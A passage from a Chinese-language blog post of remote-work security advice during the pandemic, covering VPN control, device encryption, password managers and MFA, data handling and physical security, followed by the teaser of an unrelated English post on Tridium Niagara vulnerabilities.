其中值得特別點出的是 VPN 的設定與開放。近期聽聞到不少公司的管理階層談論到,因應疫情原本不開放 VPN 權限的同仁現在全開放了。而問到 VPN 連線進公司內部網路之後的監控跟阻隔為何,卻較少有企業具備這樣的規劃。內部網路是企業的一大資安戰場,開放 VPN 的同時,必定要思考資安對應的措施。

使用者面向

公司準備好了,接下來就是使用者的安全性了。除了公司提供的 VPN 線路、架構、機制之外,使用者本身的資安意識、規範、安全性設定也一樣重要。

保密

  • 專機專用:用來存取公司網路或資料的電腦,應嚴格遵守此原則,禁止將該設備作為非公務用途。也應避免非公司人士使用或操作該裝置。

設備相關

  • 開啟裝置協尋、鎖定、清除功能:設備若可攜帶移動,設備的遺失對應方案就必須要考慮完整。例如如何尋找裝置、如何鎖定裝置、如何遠端清除已遺失的裝置避免資料外洩。現在主流作業系統多半都會提供這些機制。
  • 設備登入密碼:裝置登入時必須設定密碼,避免外人直接操作。
  • 設備全機加密:設備若遺失遭到分析,全機加密可以降低資料被破解遺失的風險。
  • (選擇性)MDM (Mobile Device Management):若公司有導入 MDM,可以協助以上的管理。

帳號密碼安全

  • 使用密碼管理工具並設定「強密碼」:可以考慮使用密碼管理工具並將密碼設為全隨機產生包含英文、數字、符號的密碼串。
  • 不同系統帳號使用不同密碼:這個在很多次演講中都有提到,建議每個系統皆使用不同密碼,防止撞庫攻擊。
  • 帳號開啟 2FA / MFA:若系統具備 2FA / MFA 機制,務必開啟,為帳號多一層保護。

網路使用

  • 避免使用公用 Wi-Fi 連接公司網路:公眾公用網路是相當危險的,恐被側錄或竄改。若必要時可使用手機熱點或透過 VPN 連接網際網路。
  • 禁止使用公用電腦登入公司系統:外面的公用電腦難確保沒有後門、Keylogger 之類的惡意程式,一定要禁止使用公用電腦來登入任何系統。
  • 確認連線裝置是否可取得內網 IP 位址:確認內網 IP 位址是否無誤,是否能夠正常存取公司內部系統。
  • 確認連線的對外 IP 位址:確認連線至網際網路的 IP 位址是否為預期,尤其是資安服務公司,對客戶連線的 IP 位址若有錯誤,可能釀成非常嚴重的損害。
  • (選擇性)安裝個人電腦防火牆:個人防火牆可以基本監控有無可疑程式想對外連線。
  • (選擇性)採用 E2EE 通訊工具:目前企業都會使用雲端通訊軟體,通訊軟體建議採用有 E2EE (End-to-End Encryption),如此可以確保公司內的機敏通訊內容只有內部人員才能解密,就連平台商也無法存取。
  • (選擇性)工作時關閉不必要的連線(如藍牙等):部分資安專家表示,建議在工作時將電腦的非必要連線管道全數關閉,如藍牙等,在外部公眾環境或許有心人士可以透過藍牙 exploit 攻擊個人裝置。

資料管理

  • 只留存在公司設備:公司的機敏資料、文件等,必須只留存在公司設備中,避免資料外洩以及管理問題。
  • 稽核記錄:記錄機敏資料的存放、修改、擁有人等資訊。
  • 重要文件加密:重要的文件必須加密,且密碼不得存放在同一目錄。
  • 信件附件加密,密碼透過另一管道傳遞:郵件的附件除了要加密之外,密碼必須使用另一管道傳遞。例如當面告知、事前約定、透過 E2EE 加密通道、或者是透過非網路方式給予。
  • 備份資料:機敏資料一定要備份,可以遵循「3-2-1 Backup Strategy」:三份備份、兩種媒體、一個放置異地。

實體安全

  • 離開電腦時立刻鎖定螢幕:離開電腦的習慣是馬上進入螢幕保護程式並且鎖定,不少朋友是放著讓他等他自己進入鎖定,但這個時間差有心人士已經可以完成攻擊。
  • 禁止插入來路不明的隨身碟或裝置:社交工程的手法之一,就是讓同仁插入惡意的 USB,甚至有可能摧毀電腦(Bad USB, USB Killer)。
  • 注意外人偷窺螢幕或碰觸設備:若常在外工作處於公共空間,可以考慮採購螢幕防窺片。
  • 不放置電腦設備在車上:雖然台灣治安不錯,但也是不少筆電在車上遭竊,重要資產記得隨身攜帶,或者放置在隱密處。
  • 將工作區域關門或鎖上:若在自己的工作區域,為了爭取更多時間應變突發狀況,建議將工作區域的門關閉或者上鎖。

TL;DR 防疫同時也別忽視資訊安全!

網路的攻防就是一場戰爭,如果不從攻擊者的面向去思考防禦策略,不但無法有效的減緩攻擊,更可能在全世界疫情逐漸失控的當下,讓惡意人士透過這樣的時機攻擊遠距工作的企業。期望我們的經驗分享能夠給企業一些基本的指引,也希望天災人禍能夠儘速消彌。台灣加油!

  • 開放 VPN 服務前,注意帳號管理以及內網切割隔離,避免透過 VPN 存取內網任意主機。
  • 雲端、網路服務務必使用獨一無二長密碼,並開啟 MFA / 2FA 多因子認證。
  • 使用雲端服務時務必盤點存取權限,避免文件連結可被任意人存取。
  • 注意設備遺失、竊取、社交工程等實體安全議題。
  • 網路是危險的,請使用可信賴的網路,並在通訊、傳輸時採用加密方式進行。

Tridium Niagara Vulnerabilities

By: JW
5 January 2020 at 20:00
**If you’ve been contacted by me, it is because your device is on the internet and may be vulnerable to the vulnerabilities identified below. Please read through this and contact me if you have questions. Thanks** What is Tridium Niagara? Tridium is the developer of Niagara Framework. The Niagara Framework is a universal software infrastructure...
❌
❌